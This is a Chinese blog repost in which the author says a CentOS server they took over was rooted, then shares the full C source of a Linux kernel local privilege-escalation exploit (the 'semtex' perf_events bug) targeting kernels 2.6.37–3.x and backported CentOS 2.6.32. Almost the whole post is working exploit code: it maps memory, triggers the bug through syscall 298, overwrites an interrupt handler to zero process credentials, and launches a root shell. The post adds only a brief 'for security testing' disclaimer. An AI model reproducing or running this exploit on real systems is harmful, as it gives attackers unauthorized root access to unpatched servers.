Centos/CentOS 6.4 linux內核2.6.3.2本地提權exp代碼

jincon?發表于 2014-05-31 08:25:00 發表在:?代碼審計

最近我接手的一臺centos?服務器的，被黑客攻擊，直接獲取到root權限，牛逼，通過分析，大約是通過

mysql+exp提權獲得root權限。下面分享下。

具體大家可以去測試。代碼具有非常強的攻擊性，請用于安全測試，否則后果自擔。

?

http://www.jincon.com/archives/187/

/** linux 2.6.37-3.x.x x86_64, ~100 LOC* gcc-4.6 -O2 semtex.c && ./a.out* 2010 sd@fucksheep.org, salut!** update may 2013:* seems like centos 2.6.32 backported the perf bug, lol.* jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist.*/#define _GNU_SOURCE 1 #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/mman.h> #include <syscall.h> #include <stdint.h> #include <assert.h>#define BASE 0x380000000 #define SIZE 0x010000000 #define KSIZE 0x2000000 #define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))void fuck() {int i,j,k;uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) };uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192));uint64_t kbase = ((uint64_t)current)>>36;uint32_t *fixptr = (void*) AB(1);*fixptr = -1;for (i=0; i<4000; i+=4) {uint64_t *p = (void *)&current[i];uint32_t *t = (void*) p[0];if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;for (j=0; j<20; j++) { for (k = 0; k < 8; k++)if (((uint32_t*)uids)[k] != t[j+k]) goto next;for (i = 0; i < 8; i++) t[j+i] = 0;for (i = 0; i < 10; i++) t[j+9+i] = -1;return; next:; }} }void sheep(uint32_t off) {uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 };int fd = syscall(298, buf, 0, -1, -1, 0);assert(!close(fd)); }int main() {uint64_t u,g,needle, kbase, *p; uint8_t *code;uint32_t *map, j = 5;int i;struct {uint16_t limit;uint64_t addr;} __attribute__((packed)) idt;assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);memset(map, 0, SIZE);sheep(-1); sheep(-2);for (i = 0; i < SIZE/4; i++) if (map[i]) {assert(map[i+1]);break;}assert(i<SIZE/4);asm ("sidt %0" : "=m" (idt));kbase = idt.addr & 0xff000000;u = getuid(); g = getgid();assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &fuck, 1024);memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf",printf("2.6.37-3.x x86_64\nsd@fucksheep.org 2010\n") % 27);setresuid(u,u,u); setresgid(g,g,g);while (j--) {needle = AB(j+1);assert(p = memmem(code, 1024, &needle, 8));if (!p) continue;*p = j?((g<<32)|u):(idt.addr + 0x48);}sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16);asm("int $0x4"); assert(!setuid(0));return execl("/bin/bash", "-sh", NULL); }

轉載于:https://www.cnblogs.com/archoncap/p/4448210.html

總結

以上是生活随笔為你收集整理的LInux 安全测试 2的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。